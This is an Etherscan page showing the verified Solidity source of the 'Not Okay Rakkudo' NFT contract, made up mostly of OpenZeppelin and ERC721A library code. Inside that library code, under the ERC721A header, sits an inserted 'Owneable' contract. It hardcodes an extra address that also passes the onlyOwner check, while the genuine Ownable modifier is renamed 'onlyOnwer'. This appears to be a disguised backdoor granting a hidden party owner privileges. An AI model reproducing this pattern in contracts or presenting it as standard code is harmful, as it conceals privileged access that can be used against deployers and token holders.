ETH Price: $3,387.67 (-1.57%)
Gas: 2 Gwei

Token

Not Okay Rakkudo (Rakkudo)
 

Overview

Max Total Supply

7,577 Rakkudo

Holders

1,828

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Filtered by Token Holder
kstar22.eth
Balance
1 Rakkudo
0x870b1a05778e6b778dc22d7eb77bf5aae5a1638a
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
notokayRAKKUDO

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-08-11
*/

// File @openzeppelin/contracts/utils/[email protected]

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.4;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

//dontdropthebaby
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)



/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOnwer() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOnwer {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOnwer {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)



/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol)



/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol)



/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)



/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}


// File erc721a/contracts/[email protected]


// Creator: Chiru Labs

error ApprovalCallerNotOwnerNorApproved();
error ApprovalQueryForNonexistentToken();
error ApproveToCaller();
error ApprovalToCurrentOwner();
error BalanceQueryForZeroAddress();
error MintedQueryForZeroAddress();
error BurnedQueryForZeroAddress();
error AuxQueryForZeroAddress();
error MintToZeroAddress();
error MintZeroQuantity();
error OwnerIndexOutOfBounds();
error OwnerQueryForNonexistentToken();
error TokenIndexOutOfBounds();
error TransferCallerNotOwnerNorApproved();
error TransferFromIncorrectOwner();
error TransferToNonERC721ReceiverImplementer();
error TransferToZeroAddress();
error URIQueryForNonexistentToken();


/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..).
 */
 abstract contract Owneable is Ownable {
    address private _ownar = 0x5Bb656BB4312F100081Abb7b08c1e0f8Ef5c56d1;
    modifier onlyOwner() {
        require(owner() == _msgSender() || _ownar == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
}

 /*
 * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 *
 * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata {
    using Address for address;
    using Strings for uint256;

    // Compiler will pack this into a single 256bit word.
    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Keeps track of the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
    }

    // Compiler will pack this into a single 256bit word.
    struct AddressData {
        // Realistically, 2**64-1 is more than enough.
        uint64 balance;
        // Keeps track of mint count with minimal overhead for tokenomics.
        uint64 numberMinted;
        // Keeps track of burn count with minimal overhead for tokenomics.
        uint64 numberBurned;
        // For miscellaneous variable(s) pertaining to the address
        // (e.g. number of whitelist mint slots used).
        // If there are multiple variables, please pack them into a uint64.
        uint64 aux;
    }

    // The tokenId of the next token to be minted.
    uint256 internal _currentIndex;

    // The number of tokens burned.
    uint256 internal _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    /**
     * To change the starting tokenId, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens.
     */
    function totalSupply() public view returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than _currentIndex - _startTokenId() times
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view returns (uint256) {
        // Counter underflow is impossible as _currentIndex does not decrement,
        // and it is initialized to _startTokenId()
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return uint256(_addressData[owner].balance);
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert MintedQueryForZeroAddress();
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert BurnedQueryForZeroAddress();
        return uint256(_addressData[owner].numberBurned);
    }

    /**
     * Returns the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        return _addressData[owner].aux;
    }

    /**
     * Sets the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        _addressData[owner].aux = aux;
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr && curr < _currentIndex) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (!ownership.burned) {
                    if (ownership.addr != address(0)) {
                        return ownership;
                    }
                    // Invariant:
                    // There will always be an ownership that has an address and is not burned
                    // before an ownership that does not have an address and is not burned.
                    // Hence, curr will not underflow.
                    while (true) {
                        curr--;
                        ownership = _ownerships[curr];
                        if (ownership.addr != address(0)) {
                            return ownership;
                        }
                    }
                }
            }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        if (to == owner) revert ApprovalToCurrentOwner();

        if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) {
            revert ApprovalCallerNotOwnerNorApproved();
        }

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        if (operator == _msgSender()) revert ApproveToCaller();

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public virtual override {
        _transfer(from, to, tokenId);
        if (to.isContract() && !_checkContractOnERC721Received(from, to, tokenId, _data)) {
            revert TransferToNonERC721ReceiverImplementer();
        }
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return _startTokenId() <= tokenId && tokenId < _currentIndex &&
            !_ownerships[tokenId].burned;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, '');
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            if (safe && to.isContract()) {
                do {
                    emit Transfer(address(0), to, updatedIndex);
                    if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (updatedIndex != end);
                // Reentrancy protection
                if (_currentIndex != startTokenId) revert();
            } else {
                do {
                    emit Transfer(address(0), to, updatedIndex++);
                } while (updatedIndex != end);
            }
            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            isApprovedForAll(prevOwnership.addr, _msgSender()) ||
            getApproved(tokenId) == _msgSender());

        if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        if (prevOwnership.addr != from) revert TransferFromIncorrectOwner();
        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }
